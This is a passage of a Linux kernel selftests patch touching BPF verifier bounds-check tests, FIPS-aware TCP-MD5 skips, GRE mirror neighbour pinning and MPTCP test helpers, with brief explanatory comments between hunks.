++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+@@ -340,13 +356,14 @@
+ 	.insns = {
+ 	BPF_LDX_MEM(BPF_W, BPF_REG_9, BPF_REG_1,
+ 		    offsetof(struct __sk_buff, mark)),
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_MOV64_IMM(BPF_REG_8, 2),
+@@ -360,20 +377,21 @@
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, -3),
+ 	BPF_JMP_IMM(BPF_JA, 0, 0, -7),
+ 	},
+-	.fixup_map_hash_8b = { 4 },
++	.fixup_map_hash_8b = { 6 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 15",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 4),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 3),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -6),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 2),
+@@ -387,7 +405,7 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+diff --git a/tools/testing/selftests/mount_setattr/mount_setattr_test.c b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+index 969647228817b..c6a8c732b8021 100644
+--- a/tools/testing/selftests/mount_setattr/mount_setattr_test.c
++++ b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+@@ -104,13 +104,6 @@
+ 	#else
+ 		#define __NR_mount_setattr 442
+ 	#endif
+-
+-struct mount_attr {
+-	__u64 attr_set;
+-	__u64 attr_clr;
+-	__u64 propagation;
+-	__u64 userns_fd;
+-};
+ #endif
+ 
+ #ifndef __NR_open_tree
+diff --git a/tools/testing/selftests/net/fcnal-test.sh b/tools/testing/selftests/net/fcnal-test.sh
+index 21ca91473c095..ee6880ac3e5ed 100755
+--- a/tools/testing/selftests/net/fcnal-test.sh
++++ b/tools/testing/selftests/net/fcnal-test.sh
+@@ -92,6 +92,13 @@ NSC_CMD="ip netns exec ${NSC}"
+ 
+ which ping6 > /dev/null 2>&1 && ping6=$(which ping6) || ping6=$(which ping)
+ 
++# Check if FIPS mode is enabled
++if [ -f /proc/sys/crypto/fips_enabled ]; then
++	fips_enabled=`cat /proc/sys/crypto/fips_enabled`
++else
++	fips_enabled=0
++fi
++
+ ################################################################################
+ # utilities
+ 
+@@ -1216,7 +1223,7 @@ ipv4_tcp_novrf()
+ 	run_cmd nettest -d ${NSA_DEV} -r ${a}
+ 	log_test_addr ${a} $? 1 "No server, device client, local conn"
+ 
+-	ipv4_tcp_md5_novrf
++	[ "$fips_enabled" = "1" ] || ipv4_tcp_md5_novrf
+ }
+ 
+ ipv4_tcp_vrf()
+@@ -1270,9 +1277,11 @@ ipv4_tcp_vrf()
+ 	log_test_addr ${a} $? 1 "Global server, local connection"
+ 
+ 	# run MD5 tests
+-	setup_vrf_dup
+-	ipv4_tcp_md5
+-	cleanup_vrf_dup
++	if [ "$fips_enabled" = "0" ]; then
++		setup_vrf_dup
++		ipv4_tcp_md5
++		cleanup_vrf_dup
++	fi
+ 
+ 	#
+ 	# enable VRF global server
+@@ -2772,7 +2781,7 @@ ipv6_tcp_novrf()
+ 		log_test_addr ${a} $? 1 "No server, device client, local conn"
+ 	done
+ 
+-	ipv6_tcp_md5_novrf
++	[ "$fips_enabled" = "1" ] || ipv6_tcp_md5_novrf
+ }
+ 
+ ipv6_tcp_vrf()
+@@ -2842,9 +2851,11 @@ ipv6_tcp_vrf()
+ 	log_test_addr ${a} $? 1 "Global server, local connection"
+ 
+ 	# run MD5 tests
+-	setup_vrf_dup
+-	ipv6_tcp_md5
+-	cleanup_vrf_dup
++	if [ "$fips_enabled" = "0" ]; then
++		setup_vrf_dup
++		ipv6_tcp_md5
++		cleanup_vrf_dup
++	fi
+ 
+ 	#
+ 	# enable VRF global server
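The TCP-MD5 cases exercise the TCP_MD5SIG socket option, and MD5 is not a
FIPS-approved digest, so those cases cannot pass on a FIPS-enabled kernel;
the script now skips them instead of failing. A quick manual check of the
same gate (a sketch; the sysctl file is absent on kernels built without
FIPS support):

	if [ "$(cat /proc/sys/crypto/fips_enabled 2>/dev/null)" = "1" ]; then
		echo "FIPS mode is on: TCP-MD5 cases will be skipped"
	fi
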
+diff --git a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh
+index c5095da7f6bf8..aec752a22e9ec 100755
+--- a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh
++++ b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1d.sh
+@@ -93,12 +93,16 @@ cleanup()
+ 
+ test_gretap()
+ {
++	ip neigh replace 192.0.2.130 lladdr $(mac_get $h3) \
++		 nud permanent dev br2
+ 	full_test_span_gre_dir gt4 ingress 8 0 "mirror to gretap"
+ 	full_test_span_gre_dir gt4 egress 0 8 "mirror to gretap"
+ }
+ 
+ test_ip6gretap()
+ {
++	ip neigh replace 2001:db8:2::2 lladdr $(mac_get $h3) \
++		nud permanent dev br2
+ 	full_test_span_gre_dir gt6 ingress 8 0 "mirror to ip6gretap"
+ 	full_test_span_gre_dir gt6 egress 0 8 "mirror to ip6gretap"
+ }
+diff --git a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh
+index 9ff22f28032dd..0cf4c47a46f9b 100755
+--- a/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh
++++ b/tools/testing/selftests/net/forwarding/mirror_gre_bridge_1q.sh
+@@ -90,12 +90,16 @@ cleanup()
+ 
+ test_gretap()
+ {
++	ip neigh replace 192.0.2.130 lladdr $(mac_get $h3) \
++		 nud permanent dev br1
+ 	full_test_span_gre_dir gt4 ingress 8 0 "mirror to gretap"
+ 	full_test_span_gre_dir gt4 egress 0 8 "mirror to gretap"
+ }
+ 
+ test_ip6gretap()
+ {
++	ip neigh replace 2001:db8:2::2 lladdr $(mac_get $h3) \
++		nud permanent dev br1
+ 	full_test_span_gre_dir gt6 ingress 8 0 "mirror to ip6gretap"
+ 	full_test_span_gre_dir gt6 egress 0 8 "mirror to ip6gretap"
+ }
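Both bridge variants now pin a permanent neighbour entry for the tunnel's
remote address before mirroring, so the test no longer depends on ARP/ND
resolution through the bridge racing the traffic check. mac_get comes from
the shared forwarding library and is not part of this hunk; a rough,
hypothetical stand-in, assuming jq is available:

	# Hypothetical equivalent of the forwarding lib's mac_get helper.
	mac_get()
	{
		local if_name=$1
		ip -j link show dev "$if_name" | jq -r '.[].address'
	}

	# Pinning the entry removes the resolution race ($h3 is the
	# receiving host port in the test topology).
	ip neigh replace 192.0.2.130 lladdr "$(mac_get "$h3")" \
		nud permanent dev br2
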
+diff --git a/tools/testing/selftests/net/mptcp/config b/tools/testing/selftests/net/mptcp/config
+index 38021a0dd5276..6032f9b23c4c2 100644
+--- a/tools/testing/selftests/net/mptcp/config
++++ b/tools/testing/selftests/net/mptcp/config
+@@ -1,3 +1,4 @@
++CONFIG_KALLSYMS=y
+ CONFIG_MPTCP=y
+ CONFIG_IPV6=y
+ CONFIG_MPTCP_IPV6=y
+diff --git a/tools/testing/selftests/net/mptcp/diag.sh b/tools/testing/selftests/net/mptcp/diag.sh
+index dd730a35bd128..400cf1ce96e31 100755
+--- a/tools/testing/selftests/net/mptcp/diag.sh
++++ b/tools/testing/selftests/net/mptcp/diag.sh
+@@ -42,27 +42,39 @@ fi
+ 
+ __chk_nr()
+ {
+-	local condition="$1"
++	local command="$1"
+ 	local expected=$2
+-	local msg nr
++	local msg="$3"
++	local skip="${4:-SKIP}"
++	local nr
+ 
+-	shift 2
+-	msg=$*
+-	nr=$(ss -inmHMN $ns | $condition)
++	nr=$(eval $command)
+ 
+ 	printf "%-50s" "$msg"
+ 	if [ $nr != $expected ]; then
+-		echo "[ fail ] expected $expected found $nr"
+-		ret=$test_cnt
++		if [ $nr = "$skip" ] && ! mptcp_lib_expect_all_features; then
++			echo "[ skip ] Feature probably not supported"
++		else
++			echo "[ fail ] expected $expected found $nr"
++			ret=$test_cnt
++		fi
+ 	else
+ 		echo "[  ok  ]"
+ 	fi
+ 	test_cnt=$((test_cnt+1))
+ }
+ 
++__chk_msk_nr()
++{
++	local condition=$1
++	shift 1
++
++	__chk_nr "ss -inmHMN $ns | $condition" "$@"
++}
++
+ chk_msk_nr()
+ {
+-	__chk_nr "grep -c token:" $*
++	__chk_msk_nr "grep -c token:" "$@"
+ }
+ 
+ wait_msk_nr()
+@@ -100,37 +112,26 @@ wait_msk_nr()
+ 
+ chk_msk_fallback_nr()
+ {
+-		__chk_nr "grep -c fallback" $*
++	__chk_msk_nr "grep -c fallback" "$@"
+ }
+ 
+ chk_msk_remote_key_nr()
+ {
+-		__chk_nr "grep -c remote_key" $*
++	__chk_msk_nr "grep -c remote_key" "$@"
+ }
+ 
+ __chk_listen()
+ {
+ 	local filter="$1"
+ 	local expected=$2
++	local msg="$3"
+ 
+-	shift 2
+-	msg=$*
+-
+-	nr=$(ss -N $ns -Ml "$filter" | grep -c LISTEN)
+-	printf "%-50s" "$msg"
+-
+-	if [ $nr != $expected ]; then
+-		echo "[ fail ] expected $expected found $nr"
+-		ret=$test_cnt
+-	else
+-		echo "[  ok  ]"
+-	fi
++	__chk_nr "ss -N $ns -Ml '$filter' | grep -c LISTEN" "$expected" "$msg" 0
+ }
+ 
+ chk_msk_listen()
+ {
+ 	lport=$1
+-	local msg="check for listen socket"
+ 
+ 	# destination port search should always return empty list
+ 	__chk_listen "dport $lport" 0 "listen match for dport $lport"
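After this refactor, __chk_nr receives the whole counting command as a
string, plus an optional fourth argument naming the value that signals the
feature is unavailable (SKIP by default, 0 for the listen checks), so a
miss on older kernels reports a skip rather than a failure. A usage sketch
with hypothetical values:

	# Expect one listening msk; a count of 0 means the MPTCP diag
	# support is probably missing, so print [ skip ] not [ fail ].
	__chk_nr "ss -N $ns -Ml 'sport = :10000' | grep -c LISTEN" 1 \
		"listen socket present" 0
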
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.c b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+index e54653ea2ed4f..7df6b9b6f9a84 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+@@ -98,8 +98,8 @@ static struct cfg_sockopt_types cfg_sockopt_types;
+ static void die_usage(void)
+ {
+ 	fprintf(stderr, "Usage: mptcp_connect [-6] [-c cmsg] [-f offset] [-i file] [-I num] [-j] [-l] "
+-		"[-m mode] [-M mark] [-o option] [-p port] [-P mode] [-j] [-l] [-r num] "
+-		"[-s MPTCP|TCP] [-S num] [-r num] [-t num] [-T num] [-u] [-w sec] connect_address\n");
++		"[-m mode] [-M mark] [-o option] [-p port] [-P mode] [-r num] [-R num] "
++		"[-s MPTCP|TCP] [-S num] [-t num] [-T num] [-w sec] connect_address\n");
+ 	fprintf(stderr, "\t-6 use ipv6\n");
+ 	fprintf(stderr, "\t-c cmsg -- test cmsg type <cmsg>\n");
+ 	fprintf(stderr, "\t-f offset -- stop the I/O after receiving and sending the specified amount "
+@@ -118,13 +118,13 @@ static void die_usage(void)
+ 	fprintf(stderr, "\t-p num -- use port num\n");
+ 	fprintf(stderr,
+		"\t-P [saveWithPeek|saveAfterPeek] -- save data with/after MSG_PEEK from tcp socket\n");
+-	fprintf(stderr, "\t-t num -- set poll timeout to num\n");
+-	fprintf(stderr, "\t-T num -- set expected runtime to num ms\n");
+ 	fprintf(stderr, "\t-r num -- enable slow mode, limiting each write to num bytes "
+ 		"-- for remove addr tests\n");
+ 	fprintf(stderr, "\t-R num -- set SO_RCVBUF to num\n");
+ 	fprintf(stderr, "\t-s [MPTCP|TCP] -- use mptcp(default) or tcp sockets\n");
+ 	fprintf(stderr, "\t-S num -- set SO_SNDBUF to num\n");
++	fprintf(stderr, "\t-t num -- set poll timeout to num\n");
++	fprintf(stderr, "\t-T num -- set expected runtime to num ms\n");
+ 	fprintf(stderr, "\t-w num -- wait num sec before closing the socket\n");
+ 	exit(1);
+ }
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index c923ce5ff6eb7..36dc2bab7a13c 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -144,6 +144,7 @@ cleanup()
+ }
+ 
+ mptcp_lib_check_mptcp
++mptcp_lib_check_kallsyms
+ 
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+@@ -696,6 +697,15 @@ run_test_transparent()
+ 		return 0
+ 	fi
+ 
++	# IP(V6)_TRANSPARENT has been added after TOS support which came with
++	# the required infrastructure in MPTCP sockopt code. To support TOS, the
++	# following function has been exported (T). Not great but better than
++	# checking for a specific kernel version.
++	if ! mptcp_lib_kallsyms_has "T __ip_sock_set_tos$"; then
++		echo "INFO: ${msg} not supported by the kernel: SKIP"
++		return
++	fi
++
+ ip netns exec "$listener_ns" nft -f /dev/stdin <<"EOF"
+ flush ruleset
+ table inet mangle {
+@@ -772,6 +782,11 @@ run_tests_disconnect()
+ 	local old_cin=$cin
+ 	local old_sin=$sin
+ 
++	if ! mptcp_lib_kallsyms_has "mptcp_pm_data_reset$"; then
++		echo "INFO: Full disconnect not supported: SKIP"
++		return
++	fi
++
+ 	cat $cin $cin $cin > "$cin".disconnect
+ 
+	# force do_transfer to cope with the multiple transmissions
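The availability checks above key off kernel symbols rather than version
numbers: CONFIG_KALLSYMS, now required via the config fragment, exposes
every kernel symbol in /proc/kallsyms, and mptcp_lib_kallsyms_has, defined
in mptcp_lib.sh outside this patch, presumably reduces to a probe along
these lines:

	# Sketch of the symbol probe; the argument is an anchored
	# "TYPE name$" pattern such as "T __ip_sock_set_tos$".
	mptcp_lib_kallsyms_has()
	{
		grep -q " ${1}" /proc/kallsyms
	}
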
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 6be19b1038243..7b65003ee8cff 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -8,6 +8,10 @@
+ 
+ . "$(dirname "${0}")/mptcp_lib.sh"
+ 
++# ShellCheck incorrectly believes that most of the code here is unreachable
++# because it's invoked by variable name, see how the "tests" array is used
++#shellcheck disable=SC2317
++
+ ret=0
+ sin=""
+ sinfail=""
+@@ -21,6 +25,8 @@ capout=""
+ ns1=""
+ ns2=""
+ ksft_skip=4
++iptables="iptables"
++ip6tables="ip6tables"
+ timeout_poll=30
+ timeout_test=$((timeout_poll * 2 + 1))
+ capture=0
+@@ -73,7 +79,7 @@ init_partial()
+ 		ip netns add $netns || exit $ksft_skip
+ 		ip -net $netns link set lo up
+ 		ip netns exec $netns sysctl -q net.mptcp.enabled=1
+-		ip netns exec $netns sysctl -q net.mptcp.pm_type=0
++		ip netns exec $netns sysctl -q net.mptcp.pm_type=0 2>/dev/null || true
+ 		ip netns exec $netns sysctl -q net.ipv4.conf.all.rp_filter=0
+ 		ip netns exec $netns sysctl -q net.ipv4.conf.default.rp_filter=0
+ 		if [ $checksum -eq 1 ]; then
+@@ -131,13 +137,18 @@ cleanup_partial()
+ check_tools()
+ {
+ 	mptcp_lib_check_mptcp
++	mptcp_lib_check_kallsyms
+ 
+ 	if ! ip -Version &> /dev/null; then
+ 		echo "SKIP: Could not run test without ip tool"
+ 		exit $ksft_skip
+ 	fi
+ 
+-	if ! iptables -V &> /dev/null; then
++	# Use the legacy version if available to support old kernel versions
++	if iptables-legacy -V &> /dev/null; then
++		iptables="iptables-legacy"
++		ip6tables="ip6tables-legacy"
++	elif ! iptables -V &> /dev/null; then
+ 		echo "SKIP: Could not run all tests without iptables tool"
+ 		exit $ksft_skip
+ 	fi
+@@ -173,6 +184,32 @@ cleanup()
+ 	cleanup_partial
+ }
+ 
++# $1: msg
++print_title()
++{
++	printf "%03u %-36s %s" "${TEST_COUNT}" "${TEST_NAME}" "${1}"
++}
++
++# [ $1: fail msg ]
++mark_as_skipped()
++{
++	local msg="${1:-"Feature not supported"}"
++
++	mptcp_lib_fail_if_expected_feature "${msg}"
++
++	print_title "[ skip ] ${msg}"
++	printf "\n"
++}
++
++# $@: condition
++continue_if()
++{
++	if ! "${@}"; then
++		mark_as_skipped
++		return 1
++	fi
++}
++
+ skip_test()
+ {
+ 	if [ "${#only_tests_ids[@]}" -eq 0 ] && [ "${#only_tests_names[@]}" -eq 0 ]; then
+@@ -216,6 +253,19 @@ reset()
+ 	return 0
+ }
+ 
++# $1: test name ; $2: counter to check
++reset_check_counter()
++{
++	reset "${1}" || return 1
++
++	local counter="${2}"
++
++	if ! nstat -asz "${counter}" | grep -wq "${counter}"; then
++		mark_as_skipped "counter '${counter}' is not available"
++		return 1
++	fi
++}
++
+ # $1: test name
+ reset_with_cookies()
+ {
+@@ -235,17 +285,21 @@ reset_with_add_addr_timeout()
+ 
+ 	reset "${1}" || return 1
+ 
+-	tables="iptables"
++	tables="${iptables}"
+ 	if [ $ip -eq 6 ]; then
+-		tables="ip6tables"
++		tables="${ip6tables}"
+ 	fi
+ 
+ 	ip netns exec $ns1 sysctl -q net.mptcp.add_addr_timeout=1
+-	ip netns exec $ns2 $tables -A OUTPUT -p tcp \
+-		-m tcp --tcp-option 30 \
+-		-m bpf --bytecode \
+-		"$CBPF_MPTCP_SUBOPTION_ADD_ADDR" \
+-		-j DROP
++
++	if ! ip netns exec $ns2 $tables -A OUTPUT -p tcp \
++			-m tcp --tcp-option 30 \
++			-m bpf --bytecode \
++			"$CBPF_MPTCP_SUBOPTION_ADD_ADDR" \
++			-j DROP; then
++		mark_as_skipped "unable to set the 'add addr' rule"
++		return 1
++	fi
+ }
+ 
+ # $1: test name
+@@ -289,22 +343,17 @@ reset_with_allow_join_id0()
+ #     tc action pedit offset 162 out of bounds
+ #
+ # Netfilter is used to mark packets with enough data.
+-reset_with_fail()
++setup_fail_rules()
+ {
+-	reset "${1}" || return 1
+-
+-	ip netns exec $ns1 sysctl -q net.mptcp.checksum_enabled=1
+-	ip netns exec $ns2 sysctl -q net.mptcp.checksum_enabled=1
+-
+ 	check_invert=1
+ 	validate_checksum=1
+-	local i="$2"
+-	local ip="${3:-4}"
++	local i="$1"
++	local ip="${2:-4}"
+ 	local tables
+ 
+-	tables="iptables"
++	tables="${iptables}"
+ 	if [ $ip -eq 6 ]; then
+-		tables="ip6tables"
++		tables="${ip6tables}"
+ 	fi
+ 
+ 	ip netns exec $ns2 $tables \
+@@ -314,15 +363,51 @@ reset_with_fail()
+ 		-p tcp \
+ 		-m length --length 150:9999 \
+ 		-m statistic --mode nth --packet 1 --every 99999 \
+-		-j MARK --set-mark 42 || exit 1
++		-j MARK --set-mark 42 || return ${ksft_skip}
+ 
+-	tc -n $ns2 qdisc add dev ns2eth$i clsact || exit 1
++	tc -n $ns2 qdisc add dev ns2eth$i clsact || return ${ksft_skip}
+ 	tc -n $ns2 filter add dev ns2eth$i egress \
+ 		protocol ip prio 1000 \
+ 		handle 42 fw \
+ 		action pedit munge offset 148 u8 invert \
+ 		pipe csum tcp \
+-		index 100 || exit 1
++		index 100 || return ${ksft_skip}
++}
++
++reset_with_fail()
++{
++	reset_check_counter "${1}" "MPTcpExtInfiniteMapTx" || return 1
++	shift
++
++	ip netns exec $ns1 sysctl -q net.mptcp.checksum_enabled=1
++	ip netns exec $ns2 sysctl -q net.mptcp.checksum_enabled=1
++
++	local rc=0
++	setup_fail_rules "${@}" || rc=$?
++
++	if [ ${rc} -eq ${ksft_skip} ]; then
++		mark_as_skipped "unable to set the 'fail' rules"
++		return 1
++	fi
++}
++
++reset_with_tcp_filter()
++{
++	reset "${1}" || return 1
++	shift
++
++	local ns="${!1}"
++	local src="${2}"
++	local target="${3}"
++
++	if ! ip netns exec "${ns}" ${iptables} \
++			-A INPUT \
++			-s "${src}" \
++			-p tcp \
++			-j "${target}"; then
++		mark_as_skipped "unable to set the filter rules"
++		return 1
++	fi
+ }
+ 
+ fail_test()
+@@ -357,8 +442,9 @@ check_transfer()
+ 
+ 	local line
+ 	if [ -n "$bytes" ]; then
++		local out_size
+ 		# when truncating we must check the size explicitly
+-		local out_size=$(wc -c $out | awk '{print $1}')
++		out_size=$(wc -c $out | awk '{print $1}')
+ 		if [ $out_size -ne $bytes ]; then
+ 			echo "[ FAIL ] $what output file has wrong size ($out_size, $bytes)"
+ 			fail_test
+@@ -442,11 +528,25 @@ wait_local_port_listen()
+ 	done
+ }
+ 
+-rm_addr_count()
++# $1: ns ; $2: counter
++get_counter()
+ {
+-	local ns=${1}
++	local ns="${1}"
++	local counter="${2}"
++	local count
++
++	count=$(ip netns exec ${ns} nstat -asz "${counter}" | awk 'NR==1 {next} {print $2}')
++	if [ -z "${count}" ]; then
++		mptcp_lib_fail_if_expected_feature "${counter} counter"
++		return 1
++	fi
+ 
+-	ip netns exec ${ns} nstat -as | grep MPTcpExtRmAddr | awk '{print $2}'
++	echo "${count}"
++}
++
++rm_addr_count()
++{
++	get_counter "${1}" "MPTcpExtRmAddr"
+ }
+ 
+ # $1: ns, $2: old rm_addr counter in $ns
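get_counter reads counters with "nstat -asz": with -z, a counter that
exists but has seen no events still prints a zero line, while a counter
the kernel does not implement prints nothing, letting callers tell "zero"
apart from "unsupported". Usage sketch:

	# Empty output (exit status 1) means the kernel lacks the
	# counter, not that zero events were observed.
	count=$(get_counter "${ns1}" "MPTcpExtMPJoinSynRx") || \
		echo "counter not available on this kernel"
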
+@@ -469,11 +569,11 @@ wait_mpj()
+ 	local ns="${1}"
+ 	local cnt old_cnt
+ 
+-	old_cnt=$(ip netns exec ${ns} nstat -as | grep MPJoinAckRx | awk '{print $2}')
++	old_cnt=$(get_counter ${ns} "MPTcpExtMPJoinAckRx")
+ 
+ 	local i
+ 	for i in $(seq 10); do
+-		cnt=$(ip netns exec ${ns} nstat -as | grep MPJoinAckRx | awk '{print $2}')
++		cnt=$(get_counter ${ns} "MPTcpExtMPJoinAckRx")
+ 		[ "$cnt" = "${old_cnt}" ] || break
+ 		sleep 0.1
+ 	done
+@@ -487,6 +587,7 @@ kill_wait()
+ 
+ kill_tests_wait()
+ {
++	#shellcheck disable=SC2046
+ 	kill -SIGUSR1 $(ip netns pids $ns2) $(ip netns pids $ns1)
+ 	wait
+ }
+@@ -666,15 +767,6 @@ pm_nl_check_endpoint()
+ 	fi
+ }
+ 
+-filter_tcp_from()
+-{
+-	local ns="${1}"
+-	local src="${2}"
+-	local target="${3}"
+-
+-	ip netns exec "${ns}" iptables -A INPUT -s "${src}" -p tcp -j "${target}"
+-}
+-
+ do_transfer()
+ {
+ 	local listener_ns="$1"
+@@ -854,11 +946,12 @@ do_transfer()
+ 				sp=$(grep "type:10" "$evts_ns1" |
+ 				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				da=$(grep "type:10" "$evts_ns1" |
+-				     sed -n 's/.*\(daddr6:\)\([0-9a-f:.]*\).*$/\2/p;q')
++				     sed -n 's/.*\(daddr[46]:\)\([0-9a-f:.]*\).*$/\2/p;q')
++				echo "$da" | grep -q ":" && addr="::ffff:$addr"
+ 				dp=$(grep "type:10" "$evts_ns1" |
+ 				     sed -n 's/.*\(dport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl rem token $tk id $id
+-				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "::ffff:$addr" \
++				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "$addr" \
+ 							lport $sp rip $da rport $dp token $tk
+ 			fi
+ 
+@@ -1152,12 +1245,13 @@ chk_csum_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "sum"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtDataCsumErr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns1} "MPTcpExtDataCsumErr")
+ 	if [ "$count" != "$csum_ns1" ]; then
+ 		extra_msg="$extra_msg ns1=$count"
+ 	fi
+-	if { [ "$count" != $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 0 ]; } ||
+ 	   { [ "$count" -lt $csum_ns1 ] && [ $allow_multi_errors_ns1 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns1"
+ 		fail_test
+@@ -1166,12 +1260,13 @@ chk_csum_nr()
+ 		echo -n "[ ok ]"
+ 	fi
+ 	echo -n " - csum  "
+-	count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtDataCsumErr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns2} "MPTcpExtDataCsumErr")
+ 	if [ "$count" != "$csum_ns2" ]; then
+ 		extra_msg="$extra_msg ns2=$count"
+ 	fi
+-	if { [ "$count" != $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 0 ]; } ||
+ 	   { [ "$count" -lt $csum_ns2 ] && [ $allow_multi_errors_ns2 -eq 1 ]; }; then
+ 		echo "[fail] got $count data checksum error[s] expected $csum_ns2"
+ 		fail_test
+@@ -1213,12 +1308,13 @@ chk_fail_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "ftx"
+-	count=$(ip netns exec $ns_tx nstat -as | grep MPTcpExtMPFailTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns_tx} "MPTcpExtMPFailTx")
+ 	if [ "$count" != "$fail_tx" ]; then
+ 		extra_msg="$extra_msg,tx=$count"
+ 	fi
+-	if { [ "$count" != "$fail_tx" ] && [ $allow_tx_lost -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != "$fail_tx" ] && [ $allow_tx_lost -eq 0 ]; } ||
+ 	   { [ "$count" -gt "$fail_tx" ] && [ $allow_tx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] TX expected $fail_tx"
+ 		fail_test
+@@ -1228,12 +1324,13 @@ chk_fail_nr()
+ 	fi
+ 
+ 	echo -n " - failrx"
+-	count=$(ip netns exec $ns_rx nstat -as | grep MPTcpExtMPFailRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
++	count=$(get_counter ${ns_rx} "MPTcpExtMPFailRx")
+ 	if [ "$count" != "$fail_rx" ]; then
+ 		extra_msg="$extra_msg,rx=$count"
+ 	fi
+-	if { [ "$count" != "$fail_rx" ] && [ $allow_rx_lost -eq 0 ]; } ||
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif { [ "$count" != "$fail_rx" ] && [ $allow_rx_lost -eq 0 ]; } ||
+ 	   { [ "$count" -gt "$fail_rx" ] && [ $allow_rx_lost -eq 1 ]; }; then
+ 		echo "[fail] got $count MP_FAIL[s] RX expected $fail_rx"
+ 		fail_test
+@@ -1265,10 +1362,11 @@ chk_fclose_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "ctx"
+-	count=$(ip netns exec $ns_tx nstat -as | grep MPTcpExtMPFastcloseTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	[ "$count" != "$fclose_tx" ] && extra_msg="$extra_msg,tx=$count"
+-	if [ "$count" != "$fclose_tx" ]; then
